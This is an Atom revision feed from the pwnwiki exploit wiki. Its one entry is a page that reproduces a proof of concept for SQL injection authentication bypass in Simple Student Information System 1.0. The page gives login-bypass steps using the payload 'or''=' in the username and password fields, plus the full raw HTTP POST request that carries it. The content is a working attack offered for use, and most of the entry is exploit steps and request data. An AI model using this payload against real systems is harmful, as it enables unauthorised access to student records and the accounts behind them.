<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Simple Student Information System 1.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T04:59:00Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1663&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1663&amp;oldid=prev"/>
		<updated>2021-04-14T09:00:03Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)&lt;br /&gt;
# Date: 13 April 2021&lt;br /&gt;
# Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/11400/simple-student-information-system-ajax-live-search.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=11400&amp;amp;title=Simple+Student+Information+System+using+PHP+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: windows 10&lt;br /&gt;
&lt;br /&gt;
POC&lt;br /&gt;
&lt;br /&gt;
Step 1 - Go to url http://localhost/studentinfosystem/index.php&lt;br /&gt;
Step 2 – Enter anything in username and password&lt;br /&gt;
Step 3 – Click on Login and capture the request in burpsuite&lt;br /&gt;
Step 4 – Change the username to 'or''=' and password 'or''='&lt;br /&gt;
Step 5 – after entering the payload, you can enter the website&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
POST /studentinfosystem/index.php HTTP/1.1&lt;br /&gt;
Host: 192.168.1.14&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)&lt;br /&gt;
Gecko/20100101 Firefox/87.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 46&lt;br /&gt;
Origin: http://192.168.1.14&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://192.168.1.14/studentinfosystem/index.php&lt;br /&gt;
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
username='or''='&amp;amp;password='or''='&amp;amp;login=Log+In&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>